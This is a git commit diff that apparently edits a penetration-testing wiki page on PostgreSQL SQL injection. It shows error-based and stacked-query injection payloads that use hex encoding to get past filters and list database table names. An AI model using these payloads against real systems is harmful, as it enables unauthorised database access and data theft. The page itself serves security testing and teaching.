GitBook: [#3467] No subject
This commit is contained in:
parent
3c76dd3849
commit
0b82947a50
@ -163,7 +163,7 @@ If you can run **queries** passing them **inside a string** (for example using t
|
||||
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
|
||||
|
||||
# Bypass via stacked queries + error based + query_to_xml with hex
|
||||
';select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'))-- -
|
||||
';select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user